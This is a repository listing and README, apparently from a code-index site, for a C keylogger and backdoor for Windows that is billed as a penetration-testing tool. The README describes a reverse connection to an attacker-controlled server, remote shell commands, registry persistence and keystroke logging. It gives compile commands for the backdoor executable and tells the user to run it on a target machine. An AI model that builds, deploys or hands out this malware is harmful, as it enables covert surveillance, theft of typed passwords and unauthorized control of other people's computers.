https://github.com/gotz1480/keylogger
Keylogger malware for penetration testing in Windows platforms
https://github.com/gotz1480/keylogger
backdoor backdoor-attacks backdooring keylogger malware pentest pentesting
Last synced: 6 months ago
JSON representation
Keylogger malware for penetration testing in Windows platforms
- Host: GitHub
- URL: https://github.com/gotz1480/keylogger
- Owner: gotz1480
- License: gpl-3.0
- Created: 2022-02-03T13:45:29.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-02-05T06:27:04.000Z (over 3 years ago)
- Last Synced: 2025-04-04T13:13:19.224Z (6 months ago)
- Topics: backdoor, backdoor-attacks, backdooring, keylogger, malware, pentest, pentesting
- Language: C
- Homepage:
- Size: 34.2 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# keylogger
Keylogger malware for penetration testing in Windows platforms. PLEASE USE WITH RESPONSABILITY. I AM NOT RESPONSABLE FOR MISUSE OF THIS SOFTWARE FOR ILLEGAL PURPOSES.
## Steps
1. Create connection with server (inside a main function)
2. Create shell function (wait for incoming command and iterate over certain options)
3. Automatically start program when machine is rebooted
4. Start/spawn other programs
5. Navigate through different directories
6. Implement keylogger to backdoor## Compiling backdoor
### Install mingw
`sudo apt-get install mingw-w64`
### Win32
`i686-w64-mingw32-gcc -o backdoor_win32.exe backdoor.c -lwsock32 -lwininet`
### Win64
`x86_64-w64-mingw32-gcc -o backdoor_win64.exe backdoor.c -lwsock32 -lwininet`
## Compiling server
`gcc server.c -o server.o`
## Usage
Replace in both `server.c` and `backdoor.c` files the server IP address (the attacker) "xxx.xxx.x.xx" with the actual IP address, which can be retrieved using `ifconfig`.
After compiling, run `backdoor_win32.exe` or `backdoor_win64.exe` in the target machine, preferably Windows 7. On a Linux machine, preferably Kali Linux, run `server.o`.
### Commands
`keylog_start` - starts keylogger in target machine
`persist` - creates persistence in target machine registry
`q` - quit